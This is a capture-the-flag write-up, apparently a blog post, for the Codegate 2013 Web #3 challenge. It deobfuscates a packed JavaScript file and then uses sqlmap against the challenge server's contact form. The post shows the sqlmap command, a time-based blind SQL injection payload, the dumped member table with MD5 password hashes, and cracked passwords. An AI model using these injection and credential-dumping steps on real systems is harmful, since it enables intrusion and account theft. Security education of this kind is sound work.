Codegate 2013 :: Web #3 (300 points)

This was the third challenge under the web category which was worth 300 points. The challenge began with a letter addressed to Sherlock Holmes.

	Dear Sherlock.
	Our company is hacked. We must catch a criminal!
	We found a clue 'the grey' in investigation, and we detected this site through the clue.
	http://58.229.122.17:2218
	I guess it seems hacker group's hideout.
	But...I can't find any clues to the eye.
	I need your help, Sherlock.
	We must figure out when, who asks this.
	From Hound Co.,Ltd. CEO K.B.
	Certification Form -> NAME(YYYY-MM-DD)

view raw codegate2013_web3_1.txt hosted with ❤ by GitHub

The objective of this challenge was to play the role of Sherlock Holmes and to figure out who and when the person asked the hacker group to hack “Hound Co.,Ltd.”.

Examination of the site revealed there was a suspicious Javascript file secret.js which was the first lead gathered for this challenge. However the code was clearly obfuscated as shown below. 

Contents of secret.js:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(4).8(2(){5 1=0;$(\'a.6\').7(2(){1++;3(1==9){$(\'#b\').c({d:\'.e\',f:\'./g.h\'});1=0}})});',18,18,'|cnt|function|if|document|var|S|click|ready|10||popup|bPopup|contentContainer|content|loadUrl|d56b699830e77ba53855679cb1d252da|php'.split('|'),0,{}))

view raw codegate2013_web3_2.js hosted with ❤ by GitHub

The obfuscated code was easily deobfuscated by http://jsbeautifier.org/ :)

	$(document).ready(function () {
	var cnt = 0;
	$('a.S').click(function () {
	cnt++;
	if (cnt == 10) {
	$('#popup').bPopup({
	contentContainer: '.content',
	loadUrl: './d56b699830e77ba53855679cb1d252da.php'
	});
	cnt = 0
	}
	})
	});

view raw codegate2013_web3_3.js hosted with ❤ by GitHub

Line 8 of this Javascript exposed the hidden php file, d56b699830e77ba53855679cb1d252da.php, which was revealed as a popup after the “Grey” logo was clicked for 10 times. In fact this was the login form. The challenge would be to find the login credentials to gain access to the restricted area.

Candy: md5(login) = d56b699830e77ba53855679cb1d252da

Examination of the site did not show any obvious sign of possible SQL injection flaw. Do you know of any tools that can assist you to look for such flaws?

---

There are several tools that can automate the process of detecting and exploiting SQL injection flaws and sqlmap, an open source penetration testing tool, is the tool widely used for this purpose.

Command used to identify time-based blind sqli with parameter “question”:

python sqlmap.py -u "http://58.229.122.17:2218/contact.php" --data="your_name=djteddy&your_email=djteddy@djteddy.com&question=1&your_message=djteddy&contact_submitted=send"

view raw codegate2013_web3_4.py hosted with ❤ by GitHub

Subsequently commands were issued to identify the databases, tables and table entries:

	sqlmap identified the following injection points with a total of 107 HTTP(s) requests:
	---
	Place: POST
	Parameter: question
	Type: AND/OR time-based blind
	Title: MySQL > 5.0.11 AND time-based blind
	Payload: your_name=djteddy&your_email=djteddy@djteddy.com&question=1 AND SLEEP(5)&your_message=djteddy&contact_submitted=send
	---
	web application technology: Apache
	back-end DBMS: MySQL 5.0.11
	available databases [3]:
	[*] information_schema
	[*] test
	[*] the_grey
	sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
	---
	Place: POST
	Parameter: question
	Type: AND/OR time-based blind
	Title: MySQL > 5.0.11 AND time-based blind
	Payload: your_name=djteddy&your_email=djteddy@djteddy.com&question=1 AND SLEEP(5)&your_message=djteddy&contact_submitted=send
	---
	web application technology: Apache
	back-end DBMS: MySQL 5.0.11
	Database: the_grey
	[2 tables]
	+---------+
	| contact |
	| member |
	+---------+
	sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
	---
	Place: POST
	Parameter: question
	Type: AND/OR time-based blind
	Title: MySQL > 5.0.11 AND time-based blind
	Payload: your_name=djteddy&your_email=djteddy@djteddy.com&question=1 AND SLEEP(5)&your_message=djteddy&contact_submitted=send
	---
	web application technology: Apache
	back-end DBMS: MySQL 5.0.11
	sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
	---
	Place: POST
	Parameter: question
	Type: AND/OR time-based blind
	Title: MySQL > 5.0.11 AND time-based blind
	Payload: your_name=djteddy&your_email=djteddy@djteddy.com&question=1 AND SLEEP(5)&your_message=djteddy&contact_submitted=send
	---
	web application technology: Apache
	back-end DBMS: MySQL 5.0.11
	Database: the_grey
	Table: member
	[5 entries]
	+---------+------+-------------------------------------+
	| id | `no` | password |
	+---------+------+-------------------------------------+
	| flash | 5 | c13367945d5d4c91047b3b50234aa7ab |
	| leopard | 2 | 4bad0b8dd3074cd43f641c2ac22a3571 |
	| victor | 4 | b36d331451a61eb2d76860e00c347396 |
	| warlord | 3 | 3567ff1f203d44d817e03d3660602a12 |
	| zodiac | 1 | cb2b0f9f531fd890c27af0951062d7f7 |
	+---------+------+-------------------------------------+

view raw codegate2013_web3_5.txt hosted with ❤ by GitHub

Put the passwords through md5 decrypter to be decrypted:

	+---------+----------------------------------+-------------+
	| id | password hash | password |
	+---------+----------------------------------+-------------+
	| flash | c13367945d5d4c91047b3b50234aa7ab | code |
	| leopard | 4bad0b8dd3074cd43f641c2ac22a3571 | runner |
	| victor | b36d331451a61eb2d76860e00c347396 | killer |
	| warlord | 3567ff1f203d44d817e03d3660602a12 | [Not Found] |
	| zodiac | cb2b0f9f531fd890c27af0951062d7f7 | [Not Found] |
	+---------+----------------------------------+-------------+

view raw codegate2013_web3_6.txt hosted with ❤ by GitHub

Logged in with the credentials for victor and solved the mystery! 300 points in the bag. Yay!

Cheers,
Braeburn Ladny